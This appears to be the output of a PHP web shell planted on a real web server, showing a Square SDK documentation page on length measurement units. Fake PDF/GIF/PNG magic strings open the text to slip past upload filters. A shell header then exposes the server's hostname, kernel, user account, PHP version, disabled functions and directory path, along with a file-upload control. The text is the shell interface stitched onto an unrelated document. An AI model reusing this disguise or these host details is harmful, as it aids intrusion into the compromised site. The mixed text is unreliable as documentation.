%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/www/admin1/vendor/square/square/doc/models/ |
Upload File : |
# Measurement Unit Length The unit of length used to measure a quantity. ## Enumeration `MeasurementUnitLength` ## Fields | Name | Description | | --- | --- | | `IMPERIAL_INCH` | The length is measured in inches. | | `IMPERIAL_FOOT` | The length is measured in feet. | | `IMPERIAL_YARD` | The length is measured in yards. | | `IMPERIAL_MILE` | The length is measured in miles. | | `METRIC_MILLIMETER` | The length is measured in millimeters. | | `METRIC_CENTIMETER` | The length is measured in centimeters. | | `METRIC_METER` | The length is measured in meters. | | `METRIC_KILOMETER` | The length is measured in kilometers. |